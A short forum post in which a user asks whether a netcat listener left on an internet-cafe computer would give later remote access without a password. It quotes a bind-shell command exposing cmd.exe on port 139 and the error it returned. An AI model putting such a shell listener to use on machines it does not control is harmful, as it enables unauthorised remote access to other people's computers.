Originally posted here by ne0gen
SO, theorethically, if I go to a inernet cafe, use on some computer netcat, open port 28973 for example, go home, use netcat to get remote access on the computer trough the opened port and its IP adress, I nedd no password and authorization(password etc) to get inside?(i dont want to do it, iam only interested in that).
When Ive tried it remotely(trough netcat) on my friends computer(we both have dial-up and he KNOWS about it), it shows me cant grab xxx.xxx.xxx.xxx:139 with bind. Ive tried command
nc -v -L -e cmd.exe -p 139 xxx.xxx.xxx.xxx
and it showed: xxx.xxx.xxx.xxx: inverse host lookup failed: h_errno 11004: NO_DATA
cant grab xxx.xxx.xxx.xxx:139 with bind.
Can you help me? Where am I doing wrong?